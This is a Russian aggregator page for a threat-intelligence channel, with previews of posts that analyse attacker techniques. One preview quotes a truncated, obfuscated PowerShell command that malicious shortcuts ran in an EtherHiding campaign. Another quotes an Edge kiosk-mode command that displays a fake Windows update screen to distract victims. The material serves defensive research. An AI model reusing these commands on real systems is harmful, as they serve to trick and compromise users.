@knowyouradversary
https://www.knowyouradversary.ru/
О канале Know Your Adversary
https://www.knowyouradversary.ru/
AI-обзор
Обновлено 19.07.2026Канал "Know Your Adversary" публикует аналитические материалы о кибератакках и методах злоумышленников. В постах рассматриваются различные техники, инструменты и тактики, используемые атакующими в современных кампаниях. Информация будет полезна специалистам по информационной безопасности и всем интересующимся кибербезопасностью.
Описание сформировано MaxBook AI на основе последних публикаций канала.
Основные метрики
Вовлечённость
Здоровье аудитории
Последние публикации канала «Know Your Adversary»
- 280 просмотров, 3 реакций, 19 июл. 2026 г.
Всем привет! Злоумышленники продолжают активно использовать технику EtherHiding, и сегодня мы посмотрим на очередной пример ее применения. Согласно отчету LevelBlue , атакующие распространяли вредоносные ярлыки, взаимодействие с которыми приводило к выполнению обфусцированной команды, например: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c $Se4n4GmJ=[System.Numerics.BigInteger]\7330349723455890650683895074414054\;$fobLzAK0=[System.Numerics.BigInteger]\5070886814366709789648062014091648\;$YrXdQd=$Se4n4GmJ - $fobLzAK0;for($bwusN=100+156;$YrXdQd -ne 0;$YrXdQd=$YrXdQd /…
Открыть пост в MAX - 268 просмотров, 2 реакций, 15 июл. 2026 г.
Всем привет! Очередные атакующие злоупотребляют легитимными средствами удаленного доступа - больше информации о тактиках, техниках и процедурах кластера Clubfoot Wolf в нашем новом исследовании: https://bi.zone/expertise/blog/clubfoot-wolf-massovo-komprometiruet-rossiyskie-kompanii/
Открыть пост в MAX - 346 просмотров, 14 июл. 2026 г.
Всем привет! Сегодня мы взглянем на еще один интересный пример того, как атакующие злоупотребляют браузером. В этот раз они использовали его, чтобы отвлечь жертву. Согласно этому отчету , для того, чтобы отвлечь пользователя и получить время, необходимое для корректного выполнения скриптов, злоумышленники использовали сервис fakeupdate[.]net , который позволяет продемонстрировать поддельное окно обновления Windows. При этом, атакующие запускали Microsoft Edge в режиме kiosk: start msedge.exe --kiosk https://fakeupdate[.]net/win10ue --edge-kiosk-type=fullscreen Разумеется, атакующие могут…
Открыть пост в MAX
Качество и доверие
Эвристические сигналы качества по публичным метрикам (охват, реакции, динамика подписчиков). Это не доказанный фрод и не приговор — лишь поводы присмотреться к каналу.